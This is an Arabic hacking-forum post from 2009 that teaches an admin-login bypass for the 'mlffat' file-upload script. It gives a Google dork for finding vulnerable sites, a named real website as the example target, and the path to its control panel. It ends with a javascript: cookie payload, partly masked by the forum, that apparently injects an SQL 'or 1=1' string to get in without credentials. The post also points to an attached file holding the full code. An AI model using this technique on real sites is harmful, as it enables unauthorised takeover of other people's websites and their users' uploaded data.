عرض مشاركة واحدة
قديم 05-14-2009, 12:15 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
T3BaN_HaCkEr
 
الصورة الرمزية T3BaN_HaCkEr
 

 

 
إحصائية العضو







T3BaN_HaCkEr غير متواجد حالياً

إرسال رسالة عبر MSN إلى T3BaN_HaCkEr إرسال رسالة عبر Yahoo إلى T3BaN_HaCkEr

 

 

إحصائية الترشيح

عدد النقاط : 10
T3BaN_HaCkEr is on a distinguished road

افتراضي شرح ثغرة مركز رفع ملفات "mlffat" بالصور !


السلام عليكم ورحمة الله وبركاته

اليوم بالصدفة بتصفح الميل ورم

وجدت هالثغرة الحلوة وقلت بشرحها لكم خجول

اولا

نروح لجوجل صديقنا ونحط الدورك
اقتباس
"Powered by mlffat"


حلوو طلع معنا مواقع كثيرة


الان ندخل اي موقع وانا دخلت هالموقع

اقتباس
http://medicalacademy.net/mlffat


الان نضع بعد رابط الموقع مباشرة cpanel/index.php

يعني راح يصير هيك
اقتباس
http://medicalacademy.net/mlffat/cpanel/index.php

حلو تمام الان ندخل ونشوف

راح تظهر لنا هاالصورة وهي تقول لك ادخل اليوزر والباسورد



الان نضع هذا الكود مكان رابط الموقع يعني نمسحه كله ونحطه مكانه

اقتباس
javascript:********.****** = "supervisor=OmFkbWluJyBvciAnMSc9JzE6MjEyMzJmMjk3YT U3YTVhNzQzODk0YTBlNGE4MDFmYzM="

حلو الان راح يحولنا على صفحة بيضاء وفيها الكود هذا الي حطيناه

المهم نرجع للخلف ونلاقي نفسنا في لوحة الإدارة وبدون يوزر ولا باسورد

وهذا انت معك الموقع سوي الي تريده

لكن ارجو منكم ما احد يستعمل هالطريقة للتخريب

ملاحظة : الكود في المرفقات لان بعض الكلمات محجوبة في المنتدى والكود مو جاي كامل

والسلام عليكم ورحمة الله وبركاته

T3BAN_HACKER




avp eyvm lv;. vtu lgthj "mlffat" fhgw,v !

الملفات المرفقة
نوع الملف: txt CODE.txt‏ (178 بايت, المشاهدات 266)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات
التوقيع

 


التعديل الأخير تم بواسطة T3BaN_HaCkEr ; 05-14-2009 الساعة 12:19 PM.

   

رد مع اقتباس